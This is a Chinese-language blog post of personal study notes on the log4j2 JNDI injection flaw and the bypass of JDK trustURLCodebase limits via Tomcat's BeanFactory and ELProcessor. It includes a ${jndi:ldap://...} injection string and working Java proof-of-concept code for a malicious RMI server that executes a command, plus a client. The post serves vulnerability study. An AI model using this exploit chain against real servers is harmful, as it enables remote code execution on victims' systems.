<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":30,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="lo4gj2漏洞简单学习记录log4j2和log4j简单的小区别   Log4j2分为2个jar包，一个是接口 log4j-api-版 本 号 . j a r   ， 一 个 是 具 体 实 现   l o g 4 j − c o r e − {版本号}.jar ，一个是具体实现 log4j-core-版本号.jar ，一个是具体实现 log4j−core−{版本号}.jar 。Log4j只有一个">
<meta property="og:type" content="article">
<meta property="og:title" content="log4j2漏洞学习记录">
<meta property="og:url" content="http://example.com/2022/09/23/log4j2%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/index.html">
<meta property="og:site_name" content="blueSatchel&#39;s blog">
<meta property="og:description" content="lo4gj2漏洞简单学习记录log4j2和log4j简单的小区别   Log4j2分为2个jar包，一个是接口 log4j-api-版 本 号 . j a r   ， 一 个 是 具 体 实 现   l o g 4 j − c o r e − {版本号}.jar ，一个是具体实现 log4j-core-版本号.jar ，一个是具体实现 log4j−core−{版本号}.jar 。Log4j只有一个">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220922165932132.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220922172036555.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220922174055442.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220922180330569.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220923135856558.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220923140033950.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220923140150754.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220923191015111.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220923191700911.png">
<meta property="article:published_time" content="2022-09-23T06:15:14.000Z">
<meta property="article:modified_time" content="2022-09-23T11:18:36.000Z">
<meta property="article:author" content="blueSatchel">
<meta property="article:tag" content="log4j2">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220922165932132.png">

<link rel="canonical" href="http://example.com/2022/09/23/log4j2%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>log4j2漏洞学习记录 | blueSatchel's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">blueSatchel's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/09/23/log4j2%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/../images/avatar.PNG">
      <meta itemprop="name" content="blueSatchel">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="blueSatchel's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          log4j2漏洞学习记录
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-09-23 14:15:14 / 修改时间：19:18:36" itemprop="dateCreated datePublished" datetime="2022-09-23T14:15:14+08:00">2022-09-23</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/java/" itemprop="url" rel="index"><span itemprop="name">java</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/09/23/log4j2%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/09/23/log4j2%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="lo4gj2漏洞简单学习记录"><a href="#lo4gj2漏洞简单学习记录" class="headerlink" title="lo4gj2漏洞简单学习记录"></a>lo4gj2漏洞简单学习记录</h1><p>log4j2和log4j简单的小区别</p>
<blockquote>
<ul>
<li><p>Log4j2分为2个jar包，一个是接口 log4j-api-版 本 号 . j a r   ， 一 个 是 具 体 实 现   l o g 4 j − c o r e − {版本号}.jar ，一个是具体实现 log4j-core-版本号.jar ，一个是具体实现 log4j−core−{版本号}.jar 。Log4j只有一个jar包 log4j-${版本号}.jar 。</p>
</li>
<li><p>Log4j2的版本号目前均为2.x。Log4j的版本号均为1.x。</p>
</li>
<li><p>Log4j2的package名称前缀为 org.<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=apache&spm=1001.2101.3001.7020">apache</a>.logging.log4j 。Log4j的package名称前缀为 org.apache.log4j 。</p>
</li>
</ul>
</blockquote>
<h2 id="jdk低版本"><a href="#jdk低版本" class="headerlink" title="jdk低版本"></a>jdk低版本</h2><p>在低版本jdk中,可以通过ldap和rmi服务构造远程恶意类来让其执行恶意代码</p>
<p>1、首先攻击者遭到存在风险的接口（接口会将前端输入直接通过日志打印出来），然后向该接口发送攻击内容：${jndi:ldap://localhost:9999/Test}。</p>
<p>2、被攻击服务器接收到该内容后，通过Logj42工具将其作为日志打印。</p>
<p>源码：org.apache.logging.slf4j.Log4jLogger.debug(…)/info(…)/error(…)等方法</p>
<pre><code>        &gt; org.apache.logging.log4j.core.config.LoggerConfig.log(...)

              &gt; AbstractOutputStreamAppender.append(final LogEvent event)
</code></pre>
<p>3、此时Log4j2会解析${}，读取出其中的内容。判断其为Ldap实现的JNDI。于是调用Java底层的Lookup方法，尝试完成Ldap的Lookup操作。</p>
<p>源码：StrSubstitutor.substitute(…) –解析出${}中的内容：jndi:ldap://localhost:9999/Test</p>
<pre><code>            &gt; StrSubstitutor.resolveVariable(...) --处理解析出的内容，执行lookup

            &gt; Interpolator.lookup(...) --根据jndi找到jndi的处理类

                    &gt; JndiLookup.lookup(...)

                    &gt; JndiManager.lookup(...)

                            &gt; java.naming.InitialContext.lookup(...) --调用Java底层的Lookup方法
</code></pre>
<p>后面调用的就是<code>InitialContext.lookup方法</code>从而执行了恶意代码</p>
<h5 id="低版本攻击原理"><a href="#低版本攻击原理" class="headerlink" title="低版本攻击原理"></a>低版本攻击原理</h5><p>通过上面低版本的原理分析可知，我们根据在Ldap构造了javaFactoryLocation指向Codebase，告诉客户端需要从远端Codebase去获取需要的javaFactory类。获取到之后，然后使其使用本地的类加载器加载远程恶意的javaFactory类的，然后其在加载的过程中执行恶意的static代码块，从而实现攻击。</p>
<h3 id="jdk对于lookup方法的修复"><a href="#jdk对于lookup方法的修复" class="headerlink" title="jdk对于lookup方法的修复"></a>jdk对于lookup方法的修复</h3><p>RMI的JNDI注入在<code>8u121</code>后限制,需要手动开启<code>com.sun.jndi.rmi.object.trustURLCodebase</code>属性</p>
<p>RMI的JNDI注入在<code>8u191</code>后限制,需要手动开启<code>com.sun.jndi.rmi.object.trustURLCodebase</code>属性</p>
<h4 id="限制版本绕过"><a href="#限制版本绕过" class="headerlink" title="限制版本绕过"></a>限制版本绕过</h4><p>RMI的限制是限制了远程的工厂类而不限制本地,所以用本地工厂类触发</p>
<p>通过<code>org.apache.naming.factory.BeanFactory</code>结合<code>ELProcessor</code>绕过</p>
<p>LDAP的限制中不对<code>javaSerializedData</code>验证,所以可以打本地<code>gadget</code></p>
<h3 id="具体代码执行的地方"><a href="#具体代码执行的地方" class="headerlink" title="具体代码执行的地方"></a>具体代码执行的地方</h3><p>在<code>NamingManager.getObjectFactoryFromReference()</code>方法中,如果在默认的classpath加载不到该类</p>
<p>就会请求reference中的codebase得到class内容并使用类加载器加载,之后通过默认构造函数构造对象</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220922165932132.png" alt="image-20220922165932132"></p>
<h4 id="什么是codebase"><a href="#什么是codebase" class="headerlink" title="什么是codebase"></a>什么是codebase</h4><p>codebase是一个地址，告诉Java虚拟机我们应该从哪个地方去搜索类，有点像我们日常用的 CLASSPATH，但CLASSPATH是本地路径，而codebase通常是远程URL，比如http、ftp等。</p>
<h3 id="高版本为何无效"><a href="#高版本为何无效" class="headerlink" title="高版本为何无效"></a>高版本为何无效</h3><p>上述所有操作都必须在JDK8u191之前才可以实现</p>
<p>在<code>VersionHelper12.loadClass</code>中加了一个对于trustURLCodebase的判断来控制是否允许请求codebase下载对应的class文件,其默认为false</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220922172036555.png" alt="image-20220922172036555"></p>
<p>可以手动开启trustURLCodebase</p>
<p><code>System.setProperty(&quot;com.sun.jndi.ldap.object.trustURLCodebase&quot;, &quot;true&quot;);</code>将其指定为true，</p>
<h2 id="jdk高版本"><a href="#jdk高版本" class="headerlink" title="jdk高版本"></a>jdk高版本</h2><h3 id="lookup基本功能"><a href="#lookup基本功能" class="headerlink" title="lookup基本功能"></a>lookup基本功能</h3><p>当java底层请求ldap服务之后,ldap主要返回了三个参数javaClassName,javaFactory,javaFactoryLocation,以及一些额外参数,客户端获得这些参数之后主要做一件事情:构造需要的类实例,即客户端通过javaFactory类来构建实现我们需要的javaClassName执行的实例,这个过程中需要注意一下几点</p>
<ul>
<li><p>javaFactory类是ObjectFactory的子类</p>
</li>
<li><p>javaFactory有两个来源:来自codebase(ldap返回的codebase地址),或者来自本地(ldap返回对应javaFactory的类地址)</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220922174055442.png" alt="image-20220922174055442"></p>
<ul>
<li><p>​    对于来自codeabse的Factory:和低版本中的逻辑一样,我们需要请求Codebase获取其class文件,然后加载该Factory类,并使用默认构造函数实例化出Factory实例</p>
</li>
<li><p>来自本地的Factory:直接根据ldap返回的路径(类限定符),通过Class.forName进行加载和实例化</p>
</li>
</ul>
</li>
<li><p>得到javaFactory实例后,我们需要构建通过javaFactory实例构建出JavaClassName指定的对象</p>
</li>
<li><p>log4j2通过javaFactory得到对应的对象之后,会调用其toString方法将其转换为字符串,然后用该字符串替换日志中的${…}内容,并且打印出来</p>
</li>
</ul>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220922180330569.png" alt="image-20220922180330569"></p>
<h3 id="高版本如何利用ldap实现攻击"><a href="#高版本如何利用ldap实现攻击" class="headerlink" title="高版本如何利用ldap实现攻击"></a>高版本如何利用ldap实现攻击</h3><p>我们知道高版本已经无法通过codebase获取javaFactory的class文件,所以我们想通过让客户端加载和实例化我们构建的javaFactory来实现攻击是不可能的了</p>
<p>但是还可以通过ldap实例化本地的javaFactory,并且用本地的javaFactory实例化一个本地存在的类所以现在的问题就是如何找到一个可以被利用的本地javaFactory类</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.veracode.com/blog/research/exploiting-jndi-injections-java">https://www.veracode.com/blog/research/exploiting-jndi-injections-java</a></p>
</blockquote>
<p>参考文章中提到了tomcat携带的org.apache.naming.factory.BeanFactory类就是一个存在风险的ObjectFactory子类。通过该Factory我们可以通过默认构造函数实例化任意一个类，并调用其任意的只有一个String入参的公共方法，且其方法名可以不用是标准setter的名称，而可以是任意名称。因为我们可以通过forceString来制定某个String变量的setter方法名称。</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220923135856558.png" alt="image-20220923135856558"></p>
<p>在红框中会强制替换setterName和对应的param名称</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220923140033950.png" alt="image-20220923140033950"></p>
<p>之后将param和param对应的setter方法放到map  <code>forced</code>中</p>
<p>并在接下来的代码中进行调用</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220923140150754.png" alt="image-20220923140150754"></p>
<p>基于此能力,我们就可利用<code>javax.el.ELProcessor</code>类,因为其有默认公开的无参构造方法,还有个eval方法,只有一个String入参,其可以执行EL表达式,从而执行任意指令</p>
<blockquote>
<p> 这里埋个伏笔,完事可以尝试使用codeql来查询是否存在这样的类</p>
</blockquote>
<p>evilServer</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.sun.jndi.rmi.registry.ReferenceWrapper;</span><br><span class="line"><span class="keyword">import</span> org.apache.naming.ResourceRef;</span><br><span class="line"><span class="keyword">import</span> javax.naming.StringRefAddr;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">EvilRMIServerNew</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;Creating evil RMI registry on port 1097&quot;</span>);</span><br><span class="line">        Registry registry = LocateRegistry.createRegistry(<span class="number">1097</span>);</span><br><span class="line"> </span><br><span class="line">        <span class="comment">//prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory</span></span><br><span class="line">        ResourceRef ref = <span class="keyword">new</span> ResourceRef(<span class="string">&quot;javax.el.ELProcessor&quot;</span>, <span class="keyword">null</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="keyword">true</span>,<span class="string">&quot;org.apache.naming.factory.BeanFactory&quot;</span>,<span class="keyword">null</span>);</span><br><span class="line">        <span class="comment">//redefine a setter name for the &#x27;x&#x27; property from &#x27;setX&#x27; to &#x27;eval&#x27;, see BeanFactory.getObjectInstance code</span></span><br><span class="line">        ref.add(<span class="keyword">new</span> StringRefAddr(<span class="string">&quot;forceString&quot;</span>, <span class="string">&quot;x=eval&quot;</span>));</span><br><span class="line">        <span class="comment">//expression language to execute &#x27;nslookup jndi.s.artsploit.com&#x27;, modify /bin/sh to cmd.exe if you target windows</span></span><br><span class="line">        ref.add(<span class="keyword">new</span> StringRefAddr(<span class="string">&quot;x&quot;</span>, <span class="string">&quot;\&quot;\&quot;.getClass().forName(\&quot;javax.script.ScriptEngineManager\&quot;).newInstance().getEngineByName(\&quot;JavaScript\&quot;).eval(\&quot;new java.lang.ProcessBuilder[&#x27;(java.lang.String[])&#x27;]([&#x27;calc&#x27;]).start()\&quot;)&quot;</span>));</span><br><span class="line">        </span><br><span class="line"> <span class="comment">//这里el表达式是通过&quot;&quot;空字符串.getClass</span></span><br><span class="line"> </span><br><span class="line">        ReferenceWrapper referenceWrapper = <span class="keyword">new</span> com.sun.jndi.rmi.registry.ReferenceWrapper(ref);</span><br><span class="line">        registry.bind(<span class="string">&quot;Object&quot;</span>, referenceWrapper);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>最后执行的el表达式长这样</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220923191015111.png" alt="image-20220923191015111"></p>
<p>通过””的string类型获取到String的class,所有class都继承于Class类,隐含这forName这个加载方法加载类</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220923191700911.png" alt="image-20220923191700911"></p>
<p>client</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">client</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span><span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        String url=<span class="string">&quot;rmi://127.0.0.1:1097/Object&quot;</span>;</span><br><span class="line">        Context ctx=<span class="keyword">new</span> InitialContext();</span><br><span class="line">        ctx.lookup(url);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>




    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/log4j2/" rel="tag"># log4j2</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/08/31/springboot%E9%98%B2%E5%BE%A1xss%E7%9A%84%E6%96%B9%E6%B3%95%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" rel="prev" title="springboot防御xss的方法学习记录">
      <i class="fa fa-chevron-left"></i> springboot防御xss的方法学习记录
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/09/27/shiro%E7%AE%80%E5%8D%95%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" rel="next" title="shiro简单学习记录">
      shiro简单学习记录 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#lo4gj2%E6%BC%8F%E6%B4%9E%E7%AE%80%E5%8D%95%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95"><span class="nav-number">1.</span> <span class="nav-text">lo4gj2漏洞简单学习记录</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#jdk%E4%BD%8E%E7%89%88%E6%9C%AC"><span class="nav-number">1.1.</span> <span class="nav-text">jdk低版本</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BD%8E%E7%89%88%E6%9C%AC%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="nav-number">1.1.0.0.1.</span> <span class="nav-text">低版本攻击原理</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#jdk%E5%AF%B9%E4%BA%8Elookup%E6%96%B9%E6%B3%95%E7%9A%84%E4%BF%AE%E5%A4%8D"><span class="nav-number">1.1.1.</span> <span class="nav-text">jdk对于lookup方法的修复</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%99%90%E5%88%B6%E7%89%88%E6%9C%AC%E7%BB%95%E8%BF%87"><span class="nav-number">1.1.1.1.</span> <span class="nav-text">限制版本绕过</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B7%E4%BD%93%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E7%9A%84%E5%9C%B0%E6%96%B9"><span class="nav-number">1.1.2.</span> <span class="nav-text">具体代码执行的地方</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFcodebase"><span class="nav-number">1.1.2.1.</span> <span class="nav-text">什么是codebase</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%AB%98%E7%89%88%E6%9C%AC%E4%B8%BA%E4%BD%95%E6%97%A0%E6%95%88"><span class="nav-number">1.1.3.</span> <span class="nav-text">高版本为何无效</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#jdk%E9%AB%98%E7%89%88%E6%9C%AC"><span class="nav-number">1.2.</span> <span class="nav-text">jdk高版本</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#lookup%E5%9F%BA%E6%9C%AC%E5%8A%9F%E8%83%BD"><span class="nav-number">1.2.1.</span> <span class="nav-text">lookup基本功能</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%AB%98%E7%89%88%E6%9C%AC%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8ldap%E5%AE%9E%E7%8E%B0%E6%94%BB%E5%87%BB"><span class="nav-number">1.2.2.</span> <span class="nav-text">高版本如何利用ldap实现攻击</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="blueSatchel"
      src="/../images/avatar.PNG">
  <p class="site-author-name" itemprop="name">blueSatchel</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">73</span>
          <span class="site-state-item-name">文章</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">21</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">71</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/bluesatchel" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;bluesatchel" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">blueSatchel</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'Aps2pGDp4GmAT5ebqUw6RUat-gzGzoHsz',
      appKey     : 'mikzA3qOg4gHjM10U4N8h52T',
